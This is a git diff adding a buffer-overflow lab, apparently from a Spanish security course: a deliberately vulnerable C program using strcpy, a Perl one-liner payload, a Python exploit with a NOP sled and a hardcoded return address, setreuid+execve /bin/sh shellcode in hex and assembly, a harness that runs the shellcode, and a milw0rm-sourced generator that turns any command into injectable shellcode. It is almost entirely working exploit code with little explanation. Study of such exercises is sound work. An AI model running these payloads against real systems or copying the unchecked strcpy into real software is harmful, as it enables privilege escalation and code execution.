startHEADmaster

8 files changed, 160 insertions, 0 deletions

diff --git a/c_seguridad/code/bof/.chuleta.txt b/c_seguridad/code/bof/.chuleta.txt
new file mode 100644
index 0000000..b5ddbf3
--- /dev/null
+++ b/c_seguridad/code/bof/.chuleta.txt
@@ -0,0 +1 @@
+Exploitable (repetir función): perl -e 'print "A"x72 . "\xd4\x83\x04\x08"'
diff --git a/c_seguridad/code/bof/exit.asm b/c_seguridad/code/bof/exit.asm
new file mode 100644
index 0000000..1ee5f18
--- /dev/null
+++ b/c_seguridad/code/bof/exit.asm
@@ -0,0 +1,8 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 1
+	xor		ebx, ebx
+	mov		bl, 123
+	int		0x80
diff --git a/c_seguridad/code/bof/exploit.py b/c_seguridad/code/bof/exploit.py
new file mode 100755
index 0000000..5219755
--- /dev/null
+++ b/c_seguridad/code/bof/exploit.py
@@ -0,0 +1,23 @@
+#!/usr/bin/env python2
+# -*- coding: utf-8 -*-
+
+from time import sleep
+from os import system
+
+
+shellcode = (
+    # Buffer offset
+    "\x90"*17 +
+
+	# Shellcode (55 chars)
+	"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+	"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+	"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+	"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42"
+
+    "\xf8\xf7\xff\xbf"
+    )
+
+cmd = "./exploitable " + shellcode
+
+print shellcode
diff --git a/c_seguridad/code/bof/exploitable.c b/c_seguridad/code/bof/exploitable.c
new file mode 100644
index 0000000..5492a29
--- /dev/null
+++ b/c_seguridad/code/bof/exploitable.c
@@ -0,0 +1,14 @@
+#include <string.h>
+#include <stdio.h>
+
+void vulnerable(char* str) {
+	printf("Entrando en vulnerable...\n");
+	char arr[60];
+	strcpy(arr, str);
+}
+
+int main(int argc, char** argv) {
+	if (argc > 1)
+		vulnerable(*(argv+1));
+	return 0;
+}
diff --git a/c_seguridad/code/bof/shellcode b/c_seguridad/code/bof/shellcode
new file mode 100644
index 0000000..e36a2c5
--- /dev/null
+++ b/c_seguridad/code/bof/shellcode
@@ -0,0 +1 @@
+�����������������1��F1�1�̀�1�[�C�[�C��K�S̀�����/bin/shNAAAABBBB����
diff --git a/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
new file mode 100755
index 0000000..0221f48
--- /dev/null
+++ b/c_seguridad/code/bof/shellcodeGen/shellcodeGen.c
@@ -0,0 +1,73 @@
+/**

+ *

+ * BlackLight's shellcode generator for Linux x86

+ * Tested anywhere, working & NULL-free

+ *

+ * Usage: ./generator <cmd>

+ * ...and then you've got a ready2inject NULL-free shellcode for the command you like

+ *

+ * copyleft 2008 by BlackLight <blacklight[at]autistici.org>

+ * < http://blacklight.gotdns.org >

+ *

+ * Released under GPL v.3 licence

+ *

+ * Greetz to: evilsocket, for the idea he gave me  ;) 

+ * Greetz to: my friends, who tested, used and appreciated this code and helped

+ *      me to improve it to what it is now

+ * Greetz to: my girl, next to me in any moment even if she had no idea

+ *      about what I was doing ^^

+ */

+

+#include <stdio.h>

+#include <stdlib.h>

+#include <string.h>

+

+char code[] =

+      "\\x60"                        /*pusha*/

+      "\\x31\\xc0"                   /*xor    %eax,%eax*/

+      "\\x31\\xd2"                   /*xor    %edx,%edx*/

+      "\\xb0\\x0b"                   /*mov    $0xb,%al*/

+      "\\x52"                        /*push   %edx*/

+      "\\x68\\x6e\\x2f\\x73\\x68"    /*push   $0x68732f6e*/

+      "\\x68\\x2f\\x2f\\x62\\x69"    /*push   $0x69622f2f*/

+      "\\x89\\xe3"                   /*mov    %esp,%ebx*/

+      "\\x52"                        /*push   %edx*/

+      "\\x68\\x2d\\x63\\x63\\x63"    /*push   $0x6363632d*/

+      "\\x89\\xe1"                   /*mov    %esp,%ecx*/

+      "\\x52"                        /*push   %edx*/

+      "\\xeb\\x07"                   /*jmp   804839a <cmd>*/

+      "\\x51"                        /*push   %ecx*/

+      "\\x53"                        /*push   %ebx*/

+      "\\x89\\xe1"                   /*mov    %esp,%ecx*/

+      "\\xcd\\x80"                   /*int    $0x80*/

+      "\\x61"                        /*popa*/

+      "\\xe8\\xf4\\xff\\xff\\xff"    /*call  8048393 <l1>*/;

+

+int main (int argc, char **argv)  {

+      int i,len=0;

+      char *shell,*cmd;

+

+      if (!argv[1])

+              exit(1);

+

+      for (i=1; i<argc; i++)

+              len += strlen(argv[i]);

+      len += argc;

+

+      cmd = (char*) malloc(len);

+

+      for (i=1; i<argc; i++)  {

+              strcat (cmd,argv[i]);

+              strcat (cmd,"\x20");

+      }

+

+      cmd[strlen(cmd)-1]=0;

+      shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );

+      memcpy (shell,code,sizeof(code));

+

+      for (i=0; i<strlen(cmd); i++)

+              sprintf (shell,"%s\\x%.2x",shell,cmd[i]);

+      printf ("%s\n",shell);

+}

+

+// milw0rm.com [2008-08-19]
\ No newline at end of file
diff --git a/c_seguridad/code/bof/shellex.asm b/c_seguridad/code/bof/shellex.asm
new file mode 100644
index 0000000..00968ea
--- /dev/null
+++ b/c_seguridad/code/bof/shellex.asm
@@ -0,0 +1,25 @@
+SECTION .text
+global _start
+_start:
+	xor		eax, eax
+	mov		al, 70
+	xor		ebx, ebx
+	xor		ecx, ecx
+	int		0x80
+
+	jmp short ender
+
+starter:
+	xor		eax, eax
+	pop		ebx
+	mov		[ebx+7], al
+	mov		[ebx+8], ebx
+	mov		[ebx+12], eax
+	mov		al, 11
+	lea		ecx, [ebx+8]
+	lea		edx, [ebx+12]
+	int		0x80
+
+ender:
+	call starter
+	db "/bin/shNAAAABBBB"
diff --git a/c_seguridad/code/bof/test.c b/c_seguridad/code/bof/test.c
new file mode 100644
index 0000000..c88c260
--- /dev/null
+++ b/c_seguridad/code/bof/test.c
@@ -0,0 +1,15 @@
+char shellcode[] =
+"\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x31\xc0\x5b"
+"\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
+"\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
+"\x68\x4e\x41\x41\x41\x41\x42\x42\x42\x42";
+
+//char shellcode[] =
+//"\x31\xc0\xb0\x01\x31\xdb\xb3\x7b\xcd\x80";
+
+
+int main() {
+	int (*func)();
+	func = (int (*)()) shellcode;
+	(*func)();
+}